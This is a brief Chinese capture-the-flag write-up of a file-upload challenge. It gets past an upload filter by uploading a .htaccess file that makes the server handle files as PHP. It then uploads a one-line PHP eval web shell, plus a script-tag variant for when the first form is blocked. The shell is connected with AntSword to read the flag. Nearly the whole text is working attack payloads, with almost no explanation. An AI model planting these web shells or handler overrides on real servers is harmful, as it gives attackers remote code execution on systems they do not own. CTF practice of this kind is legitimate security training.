png文件不许上传,尝试上传jpg
修改后缀名为.htaccess,文件内容为
SetHandler application/x-httpd-php
上传一句话木马
<?php eval($_POST[cmd]);?>
失败,换一种方式
<script language='php'>eval($_POST[cmd]);</script>
上传成功,蚁剑连接一下,在根目录找到flag
